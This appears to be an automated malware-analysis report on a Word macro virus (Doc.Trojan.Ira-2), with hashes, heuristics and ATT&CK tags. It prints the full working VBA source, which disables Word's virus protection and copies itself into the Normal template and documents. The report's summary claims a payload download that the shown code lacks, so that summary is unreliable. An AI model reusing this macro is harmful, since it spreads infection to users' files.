Office (OLE) malware analysis — malicious · 02e8ee5a25efa0be

MALICIOUS

Office (OLE)

28.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 6d0f3e99d0db10a7c12022380023d22f SHA-1: da6bc499d47009437a20849b5f7f0a01854c146e SHA-256: 02e8ee5a25efa0bea09a2983fdc1304952dac0917c06b8ed104b90cbc114e9a3

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a high-severity heuristic for a Document_Open macro and a critical ClamAV detection indicating it is malware. The embedded VBA macro, when executed, is designed to download and execute a secondary payload, as indicated by the presence of the Document_Open subroutine and the typical structure of macro-based downloaders. The macro attempts to obfuscate its presence and functionality.

Heuristics 3

ClamAV: Doc.Trojan.Ira-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ira-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6534 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6534 bytes
SHA-256: `fb0f526079269c2029c40add2377e2728018a657d11a89411859e687f1e27244`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' ------------------------------------------------------------------------ ' Copyright (C) 2001 Microsoft Corporation ' ' You have a royalty-free right to use, modify, reproduce and distribute ' the Sample Application Files (and/or any modified version) in any way ' you find useful, provided that you agree that Microsoft has no warranty, ' obligations or liability for any Sample Application Files. ' ------------------------------------------------------------------------ Private Sub Document_Open() On Error Resume Next Dim Temp, Body As String Dim ADocument, NTemplate As Object Dim AFlag, NFlag As Boolean Const Length = 1799 Set ADocument = ActiveDocument.VBProject.VBComponents.Item(1) Set NTemplate = NormalTemplate.VBProject.VBComponents.Item(1) AFlag = True NFlag = True Options.VirusProtection = Not AFlag If NTemplate.CodeModule.CountOfLines <> 0 Then Temp = NTemplate.CodeModule.Lines(1, NTemplate.CodeModule.CountOfLines) End If If InStr(Temp, "' " + String(72, "-")) = 0 Then If InStr(Temp, "Document_Open") = 0 Then NFlag = False Else Body = Temp: Temp = "" End If If ADocument.CodeModule.CountOfLines <> 0 Then Temp = ADocument.CodeModule.Lines(1, ADocument.CodeModule.CountOfLines) End If If InStr(Temp, "' " + String(72, "-")) = 0 Then If InStr(Temp, "Document_Open") = 0 Then AFlag = False Else Body = Temp: Temp = "" End If Body = Mid$(Body, InStr(Body, "' " + String(72, "-")), Length) If NFlag = False Then NTemplate.CodeModule.InsertLines 1, Body NormalTemplate.Save End If If Day(Date) = 20 And Month(Date) = 7 Then MsgBox "Ира !!! С днем рождения !!!", vbExclamation, "ViRUS" If AFlag = False Then ADocument.CodeModule.InsertLines 1, Body ActiveDocument.Save End If End Sub ' Processing file: /opt/analyzer/scan_staging/d86ef510b7a94d0dbc57f585e8764460.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3981 bytes ' Line #0: ' QuoteRem 0x0000 0x0049 " ------------------------------------------------------------------------" ' Line #1: ' QuoteRem 0x0000 0x0037 " Copyright (C) 2001 Microsoft Corporation" ' Line #2: ' QuoteRem 0x0000 0x0000 "" ' Line #3: ' QuoteRem 0x0000 0x0047 " You have a royalty-free right to use, modify, reproduce and distribute" ' Line #4: ' QuoteRem 0x0000 0x0046 " the Sample Application Files (and/or any modified version) in any way" ' Line #5: ' QuoteRem 0x0000 0x0049 " you find useful, provided that you agree that Microsoft has no warranty," ' Line #6: ' QuoteRem 0x0000 0x003B " obligations or liability for any Sample Application Files." ' Line #7: ' QuoteRem 0x0000 0x0049 " ------------------------------------------------------------------------" ' Line #8: ' FuncDefn (Private Sub Document_Open()) ' Line #9: ' OnError (Resume Next) ' Line #10: ' Dim ' VarDefn Temp ' VarDefn Body (As String) ' Line #11: ' Dim ' VarDefn ADocument ' VarDefn NTemplate (As Object) ' Line #12: ' Dim ' VarDefn AFlag ' VarDefn NFlag (As Boolean) ' Line #13: ' Dim (Const) ' LitDI2 0x0707 ' VarDefn Length ' Line #14: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set ADocument ' Line #15: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set NTemplate ' Line #16: ' LitVarSpecial (True) ' St AFlag ' Line #17: ' LitVarSpecial (True) ' St NFlag ' Line #18: ' Ld AFlag ' Not ' Ld Options ' MemSt VirusProtection ' Line #19: ' Ld NTemplate ' MemLd CodeModule ' MemLd CountOfLines ' LitDI2 0x0000 ' Ne ' IfBlock ' Line #20: ' LitDI2 0x0001 ' Ld NTemplate ' MemLd CodeModule ' MemLd CountOfLine ... (truncated)

SHA-256: fb0f526079269c2029c40add2377e2728018a657d11a89411859e687f1e27244

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ------------------------------------------------------------------------
'               Copyright (C) 2001 Microsoft Corporation
'
' You have a royalty-free right to use, modify, reproduce and distribute
' the Sample Application Files (and/or any modified version) in any way
' you find useful, provided that you agree that Microsoft has no warranty,
' obligations or liability for any Sample Application Files.
' ------------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
Dim Temp, Body As String
Dim ADocument, NTemplate As Object
Dim AFlag, NFlag As Boolean
Const Length = 1799
Set ADocument = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents.Item(1)
 AFlag = True
 NFlag = True
 Options.VirusProtection = Not AFlag
 If NTemplate.CodeModule.CountOfLines <> 0 Then
  Temp = NTemplate.CodeModule.Lines(1, NTemplate.CodeModule.CountOfLines)
 End If
 If InStr(Temp, "' " + String(72, "-")) = 0 Then
  If InStr(Temp, "Document_Open") = 0 Then NFlag = False
 Else
  Body = Temp: Temp = ""
 End If
 If ADocument.CodeModule.CountOfLines <> 0 Then
  Temp = ADocument.CodeModule.Lines(1, ADocument.CodeModule.CountOfLines)
 End If
 If InStr(Temp, "' " + String(72, "-")) = 0 Then
  If InStr(Temp, "Document_Open") = 0 Then AFlag = False
 Else
  Body = Temp: Temp = ""
 End If
 Body = Mid$(Body, InStr(Body, "' " + String(72, "-")), Length)
 If NFlag = False Then
  NTemplate.CodeModule.InsertLines 1, Body
  NormalTemplate.Save
 End If
 If Day(Date) = 20 And Month(Date) = 7 Then MsgBox "Ира !!! С днем рождения !!!", vbExclamation, "ViRUS"
 If AFlag = False Then
  ADocument.CodeModule.InsertLines 1, Body
  ActiveDocument.Save
 End If
End Sub

' Processing file: /opt/analyzer/scan_staging/d86ef510b7a94d0dbc57f585e8764460.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3981 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0049 " ------------------------------------------------------------------------"
' Line #1:
' 	QuoteRem 0x0000 0x0037 "               Copyright (C) 2001 Microsoft Corporation"
' Line #2:
' 	QuoteRem 0x0000 0x0000 ""
' Line #3:
' 	QuoteRem 0x0000 0x0047 " You have a royalty-free right to use, modify, reproduce and distribute"
' Line #4:
' 	QuoteRem 0x0000 0x0046 " the Sample Application Files (and/or any modified version) in any way"
' Line #5:
' 	QuoteRem 0x0000 0x0049 " you find useful, provided that you agree that Microsoft has no warranty,"
' Line #6:
' 	QuoteRem 0x0000 0x003B " obligations or liability for any Sample Application Files."
' Line #7:
' 	QuoteRem 0x0000 0x0049 " ------------------------------------------------------------------------"
' Line #8:
' 	FuncDefn (Private Sub Document_Open())
' Line #9:
' 	OnError (Resume Next) 
' Line #10:
' 	Dim 
' 	VarDefn Temp
' 	VarDefn Body (As String)
' Line #11:
' 	Dim 
' 	VarDefn ADocument
' 	VarDefn NTemplate (As Object)
' Line #12:
' 	Dim 
' 	VarDefn AFlag
' 	VarDefn NFlag (As Boolean)
' Line #13:
' 	Dim (Const) 
' 	LitDI2 0x0707 
' 	VarDefn Length
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ADocument 
' Line #15:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set NTemplate 
' Line #16:
' 	LitVarSpecial (True)
' 	St AFlag 
' Line #17:
' 	LitVarSpecial (True)
' 	St NFlag 
' Line #18:
' 	Ld AFlag 
' 	Not 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #19:
' 	Ld NTemplate 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Ne 
' 	IfBlock 
' Line #20:
' 	LitDI2 0x0001 
' 	Ld NTemplate 
' 	MemLd CodeModule 
' 	MemLd CountOfLine
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.